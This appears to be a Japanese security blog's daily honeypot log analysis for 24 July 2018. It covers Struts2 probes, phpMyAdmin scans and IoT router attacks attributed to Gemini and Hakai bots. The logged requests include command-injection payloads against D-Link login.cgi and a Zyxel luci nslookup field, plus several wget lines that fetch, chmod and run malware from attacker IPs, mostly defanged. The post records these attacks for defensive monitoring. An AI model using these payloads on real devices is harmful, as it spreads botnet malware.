S-Owl

S(ecurity)Owl

トップ > honeypot > WOWHoneypotの簡易分析(51日目)

WOWHoneypotの簡易分析(51日目)

honeypot

WOWhoneypotの2018/07/24(火) (運用51日目)の簡易分析です。
本日の総アクセス件数は 255件です。以下が全アクセスログです。

48 2018-07-24 GET /index.action
34 2018-07-24 GET /
10 2018-07-24 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://199.195.254[.]118/dlink%20-O%20-%3E%20/tmp/xd;sh%20/tmp/xd%27$
4 2018-07-24 GET /manager/html
3 2018-07-24 POST /qq.php
2 2018-07-24 PROPFIND /
2 2018-07-24 POST /xx.php
2 2018-07-24 POST /xw.php
2 2018-07-24 POST /wuwu11.php
2 2018-07-24 POST /w.php
2 2018-07-24 POST /weixiao.php
2 2018-07-24 POST /wc.php
2 2018-07-24 POST /s.php
2 2018-07-24 POST /sheep.php
2 2018-07-24 POST /phpstudy.php
2 2018-07-24 POST /mx.php
2 2018-07-24 POST /GponForm/diag_Form?images/
2 2018-07-24 POST /feixiang.php
2 2018-07-24 POST /db_session.init.php
2 2018-07-24 POST /db.init.php
2 2018-07-24 POST /9678.php
2 2018-07-24 HEAD /
2 2018-07-24 GET /xampp/phpmyadmin/index.php
2 2018-07-24 GET /www/phpMyAdmin/index.php
2 2018-07-24 GET /web/phpMyAdmin/index.php
2 2018-07-24 GET /webdav/
2 2018-07-24 GET /typo3/phpmyadmin/index.php
2 2018-07-24 GET /tools/phpMyAdmin/index.php
2 2018-07-24 GET /pmd/index.php
2 2018-07-24 GET /pma-old/index.php
2 2018-07-24 GET /pmamy/index.php
2 2018-07-24 GET /pmamy2/index.php
2 2018-07-24 GET /pma/index.php
2 2018-07-24 GET /PMA2/index.php
2 2018-07-24 GET /phpMyAdmin/phpMyAdmin/index.php
2 2018-07-24 GET /phpmyadmin/phpmyadmin/index.php
2 2018-07-24 GET /phpMyAdminold/index.php
2 2018-07-24 GET /phpMyAdmin.old/index.php
2 2018-07-24 GET /phpmyadmin-old/index.php
2 2018-07-24 GET /phpMyAdmin/index.php
2 2018-07-24 GET /phpmyadmin/index.php
2 2018-07-24 GET /phpMyadmin_bak/index.php
2 2018-07-24 GET /phpmyadmin2/index.php
2 2018-07-24 GET /phpmyadmin1/index.php
2 2018-07-24 GET /phpmyadmin0/index.php
2 2018-07-24 GET /phpadmin/index.php
2 2018-07-24 GET /mysql/index.php
2 2018-07-24 GET /mysqladmin/index.php
2 2018-07-24 GET /mysql-admin/index.php
2 2018-07-24 GET /myadmin/index.php
2 2018-07-24 GET /myadmin2/index.php
2 2018-07-24 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://185.172.164[.]41/e%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$
2 2018-07-24 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://178.128.11[.]199/qtx.mips%20-O%20-%3E%20/tmp/rz;chmod%20777%20/tmp/rz;/tmp/rz%27$
2 2018-07-24 GET /index.php
2 2018-07-24 GET /db/index.php
2 2018-07-24 GET /dbadmin/index.php
2 2018-07-24 GET /claroline/phpMyAdmin/index.php
2 2018-07-24 GET /admin/PMA/index.php
2 2018-07-24 GET /admin/pma/index.php
2 2018-07-24 GET /admin/phpmyadmin/index.php
2 2018-07-24 GET /admin/phpmyadmin2/index.php
2 2018-07-24 GET /admin/mysql/index.php
2 2018-07-24 GET /admin/mysql2/index.php
2 2018-07-24 GET /admin/index.php
1 2018-07-24 POST /zuoshou.php
1 2018-07-24 POST /yao.php
1 2018-07-24 POST /xw1.php
1 2018-07-24 POST /xshell.php
1 2018-07-24 POST /xiao.php
1 2018-07-24 POST /xiaoma.php
1 2018-07-24 POST /wshell.php
1 2018-07-24 POST /webslee.php
1 2018-07-24 POST /system.php
1 2018-07-24 POST /q.php
1 2018-07-24 POST /pe.php
1 2018-07-24 POST /log.php
1 2018-07-24 POST /lindex.php
1 2018-07-24 POST /hm.php
1 2018-07-24 POST /fack.php
1 2018-07-24 POST /defect.php
1 2018-07-24 POST /db__.init.php
1 2018-07-24 POST /data.php
1 2018-07-24 POST /conflg.php
1 2018-07-24 POST /cmd.php
1 2018-07-24 POST /cainiao.php
1 2018-07-24 POST /aotu.php
1 2018-07-24 POST /angge.php
1 2018-07-24 POST /ak47.php
1 2018-07-24 POST /7788.php
1 2018-07-24 GET /w00tw00t.at.blackhats.romanian.anti-sec:)
1 2018-07-24 GET /pma/scripts/setup.php
1 2018-07-24 GET /phpMyAdmin/scripts/setup.php
1 2018-07-24 GET /phpmyadmin/scripts/setup.php
1 2018-07-24 GET /phpma/index.php
1 2018-07-24 GET /MyAdmin/scripts/setup.php
1 2018-07-24 GET /myadmin/scripts/setup.php
1 2018-07-24 GET hxxp://5.188.210.12/echo.php
1 2018-07-24 GET hxxp://114.215.207[.]183:83/index.php
1 2018-07-24 GET /HNAP1/
1 2018-07-24 GET /foltia/
1 2018-07-24 GET /epgrec/do-record.sh
1 2018-07-24 GET /cgi-bin/luci/;stok=redacted/expert/maintenance/diagnostic/nslookup?nslookup_button=nslookup_button&ping_ip=google.ca%20%3B%20cd%20/tmp%3Bwget%20hxxp://178.128.11[.]199/rvs%20-O%20/tmp/rz%3Bchmod%20777%20/tmp/rz%3Bsh%20/tmp/rz%20

phpMyAdmin関連(85件)とphpに対するPOST(55件)と/へのアクセスを除外したアクセス数です。

48 2018-07-24 GET /index.action
10 2018-07-24 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://199.195.254[.]118/dlink%20-O%20-%3E%20/tmp/xd;sh%20/tmp/xd%27$
4 2018-07-24 GET /manager/html
2 2018-07-24 POST /GponForm/diag_Form?images/
2 2018-07-24 GET /webdav/
2 2018-07-24 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://185.172.164[.]41/e%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$
2 2018-07-24 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://178.128.11[.]199/qtx.mips%20-O%20-%3E%20/tmp/rz;chmod%20777%20/tmp/rz;/tmp/rz%27$
1 2018-07-24 GET /w00tw00t.at.blackhats.romanian.anti-sec:)
1 2018-07-24 GET hxxp://5.188.210[.]12/echo.php
1 2018-07-24 GET hxxp://114.215.207[.]183:83/index.php
1 2018-07-24 GET /HNAP1/
1 2018-07-24 GET /foltia/
1 2018-07-24 GET /epgrec/do-record.sh
1 2018-07-24 GET /cgi-bin/luci/;stok=redacted/expert/maintenance/diagnostic/nslookup?nslookup_button=nslookup_button&ping_ip=google.ca%20%3B%20cd%20/tmp%3Bwget%20hxxp://178.128.11[.]199/rvs%20-O%20/tmp/rz%3Bchmod%20777%20/tmp/rz%3Bsh%20/tmp/rz%20 

 「GET /index.action」はStruts2脆弱性への攻撃です。
DDoSボット化、CoinMinerの埋め込み等を目的とした攻撃のようです。

以下は昨日から増えたD-Linkを狙ったGeminiの攻撃です。

GET /login.cgi?cli=aa%20aa%27;wget%20http://199.195.254[.]118/dlink%20-O%20-%3E%20/tmp/xd;sh%20/tmp/xd%27$ HTTP/1.1
Connection: keep-alive
User-Agent: Gemini/2.0 

このスキャン結果によると、昨日のUA:Gemini/2.0と同じスクリプトを設置しています。
 https://urlscan.io/result/42c88bec-9812-4181-a85e-a2d3fad13eb8/
なお、海外の情報によると、VTではMirai亜種となっているがVPNFilterだ、と言っている人もいました。

類似するものとしてGponルータを狙った攻撃として以下があります。これもUA:Geminiです。

2 2018-07-24 POST /GponForm/diag_Form?images/ 

更に類似するもので新しく観測したIoT機器向けの攻撃として以下もあります。

1 2018-07-24 GET /cgi-bin/luci/;stok=redacted/expert/maintenance/diagnostic/nslookup?nslookup_button=nslookup_button&ping_ip=google.ca%20%3B%20cd%20/tmp%3Bwget%20hxxp://178.128.11[.]199/rvs%20-O%20/tmp/rz%3Bchmod%20777%20/tmp/rz%3Bsh%20/tmp/rz%20

これは以下のZyxel製ルータの脆弱性を使っているものと思われます。
https://www.exploit-db.com/exploits/41782/
これもGeminiと同じスクリプトを取得しようとしますので、同じ攻撃だと考えられます。
https://www.virustotal.com/#/url/cb4b309aca06386248d21c23bff2add5b4dc5f19a883cd2df33f9a57b3b43938/detection
https://urlscan.io/result/058c8d5f-f10b-4ebf-8e4b-81db08c885d3/

同様に昨日から引き続き、以下2つは同類と思われるUA:Hakai/2.0の攻撃です。

2 2018-07-24 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://185.172.164[.]41/e%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$
2 2018-07-24 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://178.128.11[.]199/qtx.mips%20-O%20-%3E%20/tmp/rz;chmod%20777%20/tmp/rz;/tmp/rz%27$ 

今後もますます増えていきそうで動向を注視したいと思います。

 

本日のハンティングログは以下です。Struts2脆弱性とGemini、Hakaiのものです。

11 2018-07-24 wget -c hxxp://wap.tfddos[.]net:57843/linux
https://www.virustotal.com/#/file/a038b7c52b70abf6215d93adc57a90fecdc697d01714568962aa61100cd2b54f/detection
10 2018-07-24 wget -c hxxp://111.67.194[.]29:32322/Manager
https://www.virustotal.com/#/file/1d43479df1a192de1e7872c62d6cbb49d01806c60659ca3c3390a1816c0f60dc/detection
1 2018-07-24 wget -c hxxp://111.67.194[.]29:4444/Manager 
1 2018-07-24 wget -c hxxp://23.249.162[.]123:9998/servic
10 2018-07-24 wget hxxp://199.195.254[.]118/dlink
2 2018-07-24 wget hxxp://185.172.164[.]41/e
2 2018-07-24 wget hxxp://178.128.11[.]199/qtx.mips
1 2018-07-24 wget hxxp://178.128.11[.]199/rvs

 

以上です。